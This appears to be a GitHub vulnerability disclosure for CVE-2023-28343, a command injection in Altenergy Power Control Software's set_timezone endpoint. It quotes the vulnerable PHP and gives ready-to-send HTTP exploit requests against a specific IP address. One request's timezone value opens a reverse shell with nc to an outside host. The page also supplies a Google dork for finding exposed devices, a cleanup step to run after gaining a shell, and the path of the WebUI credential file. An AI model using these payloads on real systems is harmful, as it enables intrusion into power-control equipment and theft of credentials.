Headline
CVE-2023-28343: Disclosures/os_command_injection.md at main · ahmedalroky/Disclosures
OS command injection affects Altenergy Power Control Software C1.2.5 via shell metacharacters in the index.php/management/set_timezone timezone parameter, because of set_timezone in models/management_model.php.
Permalink
Cannot retrieve contributors at this time
title : OS command injection affects "Altenergy Power Control Software"****SW ver : C1.2.5****Vendor : https://apsystems.com/****Google Dork : intitle:"Altenergy Power Control Software"****Affected device : ENERGY COMMUNICATION UNIT
vulnerable code :
“/home/local_web/pagesapplication/models/management_model.php”
public function set_timezone() { $results = array();
//获取页面选择的时区
$timezone = $this\->input\->post('timezone');
if(strlen($timezone) == 0)
$timezone = "Asia/Taipei";
//设置linux系统时区
$cmd = "cp /usr/share/zoneinfo/$timezone /etc/localtime";
system($cmd);
//将时区保存到配置文件
$fp = @fopen("/etc/yuneng/timezone.conf",'w');
if($fp){
fwrite($fp, $timezone);
fclose($fp);
}
Exploit :
HTTP request :
POST /index.php/management/set_timezone HTTP/1.1
Host: 78.218.230.32:8081
Content-Length: 33
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://78.218.230.32:8081
Referer: http://78.218.230.32:8081/index.php/management/datetime
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
timezone=`mknod /tmp/backpipe p `
HTTP request :
POST /index.php/management/set_timezone HTTP/1.1
Host: 78.218.230.32:8081
Content-Length: 73
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://78.218.230.32:8081
Referer: http://78.218.230.32:8081/index.php/management/datetime
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
timezone=`/bin/sh 0</tmp/backpipe | nc 156.197.154.12 4444 1>/tmp/backpipe`
POC :
** note **
- please use the following command after getting shell to avoid distorying the WEBUI.
“echo Asia/Taipei > /etc/yuneng/timezone.conf”
Important files to check :
- /etc/yuneng/passwd.conf this file contains the credentials for the WebUI.